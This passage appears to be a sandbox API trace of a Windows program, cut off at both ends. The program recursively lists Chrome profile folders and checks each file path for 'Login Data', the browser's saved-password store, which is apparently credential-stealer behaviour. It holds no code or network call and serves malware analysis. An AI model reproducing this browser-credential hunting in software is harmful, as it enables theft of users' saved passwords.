returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.864] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", lpString2="Shortcuts-journal" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts-journal") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts-journal" [0162.864] VirtualQuery (in: lpAddress=0x9254a8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.864] GetProcessHeap () returned 0x8e0000 [0162.864] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254a8 | out: hHeap=0x8e0000) returned 1 [0162.864] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts-journal", lpSrch="Login Data") returned 0x0 [0162.864] VirtualQuery (in: lpAddress=0x925550, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.864] GetProcessHeap () returned 0x8e0000 [0162.864] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925550 | out: hHeap=0x8e0000) returned 1 [0162.864] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x84251e10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x84251e10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x84251e10, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sync Extension Settings", cAlternateFileName="SYNCEX~1")) returned 1 [0162.864] lstrcmpiW (lpString1="Sync Extension Settings", lpString2=".") returned 1 [0162.864] lstrcmpiW (lpString1="Sync Extension Settings", lpString2="..") returned 1 [0162.864] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0162.864] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0162.864] lstrlenW (lpString="\\") returned 1 [0162.864] GetProcessHeap () returned 0x8e0000 [0162.864] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x9254a8 [0162.865] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0162.865] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.865] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 76 [0162.865] lstrlenW (lpString="Sync Extension Settings") returned 23 [0162.865] GetProcessHeap () returned 0x8e0000 [0162.865] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc8) returned 0x925550 [0162.865] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.865] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", lpString2="Sync Extension Settings" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings" [0162.865] VirtualQuery (in: lpAddress=0x9254a8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.865] GetProcessHeap () returned 0x8e0000 [0162.865] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254a8 | out: hHeap=0x8e0000) returned 1 [0162.865] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings") returned 99 [0162.865] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings") returned 99 [0162.865] lstrlenW (lpString="\\*.*") returned 4 [0162.865] GetProcessHeap () returned 0x8e0000 [0162.865] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd0) returned 0x8fcdb8 [0162.865] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings" [0162.865] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\*.*" [0162.865] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\*.*", lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x84251e10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x84251e10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x84251e10, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9b00 [0162.867] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0162.867] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x84251e10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x84251e10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x84251e10, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.867] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0162.867] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0162.867] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x84251e10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8448d2b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8448d2b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pkedcjkdefgpdelpbcmbmeomcjbeemfm", cAlternateFileName="PKEDCJ~1")) returned 1 [0162.867] lstrcmpiW (lpString1="pkedcjkdefgpdelpbcmbmeomcjbeemfm", lpString2=".") returned 1 [0162.867] lstrcmpiW (lpString1="pkedcjkdefgpdelpbcmbmeomcjbeemfm", lpString2="..") returned 1 [0162.867] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings") returned 99 [0162.867] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings") returned 99 [0162.867] lstrlenW (lpString="\\") returned 1 [0162.867] GetProcessHeap () returned 0x8e0000 [0162.867] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xca) returned 0x8fce90 [0162.867] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings" [0162.867] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\" [0162.867] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\") returned 100 [0162.867] lstrlenW (lpString="pkedcjkdefgpdelpbcmbmeomcjbeemfm") returned 32 [0162.867] GetProcessHeap () returned 0x8e0000 [0162.867] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x10a) returned 0x925620 [0162.867] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\" [0162.867] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\", lpString2="pkedcjkdefgpdelpbcmbmeomcjbeemfm" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm" [0162.867] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df090, dwLength=0x1c | out: lpBuffer=0x2df090*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2b000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.867] GetProcessHeap () returned 0x8e0000 [0162.867] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0162.867] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm") returned 132 [0162.867] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm") returned 132 [0162.867] lstrlenW (lpString="\\*.*") returned 4 [0162.867] GetProcessHeap () returned 0x8e0000 [0162.867] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x112) returned 0x925738 [0162.867] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm" [0162.867] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\*.*" [0162.867] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\*.*", lpFindFileData=0x2dee68 | out: lpFindFileData=0x2dee68*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x84251e10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8448d2b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8448d2b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8e0000, dwReserved1=0x8e0150, cFileName=".", cAlternateFileName="")) returned 0x8f9b40 [0162.873] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0162.873] FindNextFileW (in: hFindFile=0x8f9b40, lpFindFileData=0x2dee68 | out: lpFindFileData=0x2dee68*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x84251e10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8448d2b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8448d2b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8e0000, dwReserved1=0x8e0150, cFileName="..", cAlternateFileName="")) returned 1 [0162.873] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0162.873] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0162.873] FindNextFileW (in: hFindFile=0x8f9b40, lpFindFileData=0x2dee68 | out: lpFindFileData=0x2dee68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8448d2b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8448d2b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8448d2b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8e0000, dwReserved1=0x8e0150, cFileName="000003.log", cAlternateFileName="")) returned 1 [0162.873] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm") returned 132 [0162.873] lstrlenW (lpString="\\") returned 1 [0162.873] GetProcessHeap () returned 0x8e0000 [0162.873] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x10c) returned 0x925858 [0162.873] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm" [0162.874] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\" [0162.874] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\") returned 133 [0162.874] lstrlenW (lpString="000003.log") returned 10 [0162.874] GetProcessHeap () returned 0x8e0000 [0162.874] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x120) returned 0x925970 [0162.874] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\" [0162.874] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\", lpString2="000003.log" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\000003.log") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\000003.log" [0162.874] VirtualQuery (in: lpAddress=0x925858, lpBuffer=0x2dee18, dwLength=0x1c | out: lpBuffer=0x2dee18*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.874] GetProcessHeap () returned 0x8e0000 [0162.874] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925858 | out: hHeap=0x8e0000) returned 1 [0162.874] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\000003.log", lpSrch="Login Data") returned 0x0 [0162.874] VirtualQuery (in: lpAddress=0x925970, lpBuffer=0x2dee24, dwLength=0x1c | out: lpBuffer=0x2dee24*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.874] GetProcessHeap () returned 0x8e0000 [0162.874] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925970 | out: hHeap=0x8e0000) returned 1 [0162.874] FindNextFileW (in: hFindFile=0x8f9b40, lpFindFileData=0x2dee68 | out: lpFindFileData=0x2dee68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x84254520, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x84254520, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x84254520, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x10, dwReserved0=0x8e0000, dwReserved1=0x8e0150, cFileName="CURRENT", cAlternateFileName="")) returned 1 [0162.874] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm") returned 132 [0162.874] lstrlenW (lpString="\\") returned 1 [0162.874] GetProcessHeap () returned 0x8e0000 [0162.874] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x10c) returned 0x925858 [0162.874] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm" [0162.874] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\" [0162.874] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\") returned 133 [0162.874] lstrlenW (lpString="CURRENT") returned 7 [0162.874] GetProcessHeap () returned 0x8e0000 [0162.874] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11a) returned 0x925970 [0162.874] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\" [0162.874] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\", lpString2="CURRENT" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\CURRENT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\CURRENT" [0162.874] VirtualQuery (in: lpAddress=0x925858, lpBuffer=0x2dee18, dwLength=0x1c | out: lpBuffer=0x2dee18*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.874] GetProcessHeap () returned 0x8e0000 [0162.874] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925858 | out: hHeap=0x8e0000) returned 1 [0162.875] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\CURRENT", lpSrch="Login Data") returned 0x0 [0162.875] VirtualQuery (in: lpAddress=0x925970, lpBuffer=0x2dee24, dwLength=0x1c | out: lpBuffer=0x2dee24*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.875] GetProcessHeap () returned 0x8e0000 [0162.875] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925970 | out: hHeap=0x8e0000) returned 1 [0162.875] FindNextFileW (in: hFindFile=0x8f9b40, lpFindFileData=0x2dee68 | out: lpFindFileData=0x2dee68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x84254520, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x84254520, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x84254520, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8e0000, dwReserved1=0x8e0150, cFileName="LOCK", cAlternateFileName="")) returned 1 [0162.875] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm") returned 132 [0162.875] lstrlenW (lpString="\\") returned 1 [0162.875] GetProcessHeap () returned 0x8e0000 [0162.875] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x10c) returned 0x925858 [0162.875] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm" [0162.875] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension 